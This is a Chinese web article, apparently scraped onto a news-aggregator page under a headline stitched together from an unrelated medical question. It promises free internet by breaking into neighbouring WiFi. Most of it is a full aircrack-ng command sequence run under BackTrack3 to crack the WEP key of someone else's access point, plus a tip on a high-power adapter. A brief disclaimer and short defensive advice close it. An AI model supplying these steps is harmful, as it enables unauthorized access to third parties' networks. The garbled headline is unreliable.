偶看新闻脑膜瘤手术一般要多久:无线网络蹭网技术揭秘 上网不花钱
来源:百度文库 编辑:偶看新闻 时间:2024/04/30 14:02:09
随着互联网的发展,无线网络的应用越来越广泛,很多商场、酒店已经开始提供无线上网服务。对于个人用户来说,接触无线最多的方式可能就是ADSL+无线路由器了,想必你的电脑也会搜索到很多其它接入点,这些接入点或者信号很低,或者已经加密,其实这些无线信号也能被第三方利用。本着讨论技术的目的,本文将介绍无线网络破解的一些思路,但希望广大网友不要滥用,要以此为戒来保护自己的无线安全。
信号增强问题
提高接入点数量是首要问题。一般情况下,笔记本内置的无线网卡在搜寻接入点时会偏弱于外部无线网卡,另外天线问题也是一个很关键的因素,网络上有一种特殊的无线网卡,其搜索能力很强。
卡皇实物
在国内某家网站宣传的其“卡皇”产品,声称发射功率达500mw,是普通网卡的10倍,其可视传输距离为3600米,也就是半径3600米内的接入点都会被搜索到,不管该接入点是否加密。如果你住在居民区,那周围的写字楼,商场,批发市场,住宅小区,咖啡厅包含的接入点将和你家中无线路由器发出的无线信号一样,都被这款卡皇嗅探到。
我们来看看这款设备有何特殊之处:采用RTL8187L芯片,功率更强,信号接收多。完美支持BT3(这个后面会讲到),可外接天线。
搜索到无线信号以后,我们会发现大部分接入点都是加密的,接下来就需要配合软件方式破解密码。
BackTrack3(BT3)破解密码
BackTrack是基于SLAX的自启动运行光盘,是基于linux发行版的系统。目前使用最多的是V3 Final版本,但这个版本对少数网卡支持存在一些问题,所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具,可谓无线网络破解的百宝箱,全球各地的人使用它破解了无数的无线网络,从侧面促进了大众无线网络安全意识的迅速提高。
BackTrack3
由于我们需要在BT3下破解,而使用的是Windows系统,所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux,空间需要大于4GB,具体安装过程与其他系统并无两样,下面主要讲解一下进入系统后的破解工作。
打开终端窗口,输入以下命令(括号内为解释内容):
ifconfig -a (查看无线网卡Mac地址)
airmon-ng start wifi0 5
(其中wifi0是电脑里面给无线网卡的,一般都是这个,用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道,可以在左下角开始菜单里面,找到第二项Internet中的无线网工具,查看AP的频道Channel。然后会看到出现一个 Ath1,格式为XXX1样式)
airodump-ng --ivs -w name -c 5 ath1 (5和ath1根据自己的结果修改)
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 (XX内容为MAC地址)
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp (XX是网卡MAC地址,XXXXX-XXXXXX就是上次命令返回的文件名)
aireplay-ng -2 -r mrarp -x 1024 ath1
打开一个新的窗口,运行
aircrack-ng -n 64 -b ap_mac name-XX.ivs(name-XX.ivs需要到桌面生成文件夹里查看,找到序号最大的那个)
一般情况下,用不了太久,密码就会显示出来,当然只局限于破解WEP加密方式。
防范与总结
要杜绝WEP加密方式,另外最好的办法就是在无线路由器上采取MAC绑定,对准入MAC进行白名单处理,不过这种方法不太适合公用场合的AP,但换一种加密方法还是比较容易的。
设置准入设备防止蹭网者连接无线网络
对于无线破解来说并不复杂,掌握了基本的方法后破解效率觉得称得上高效,不过随着上网资费的下调,蹭网情况会越来越少,加之卡皇设备功率大,辐射也不容小视,并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕,保护好自己的无线网络。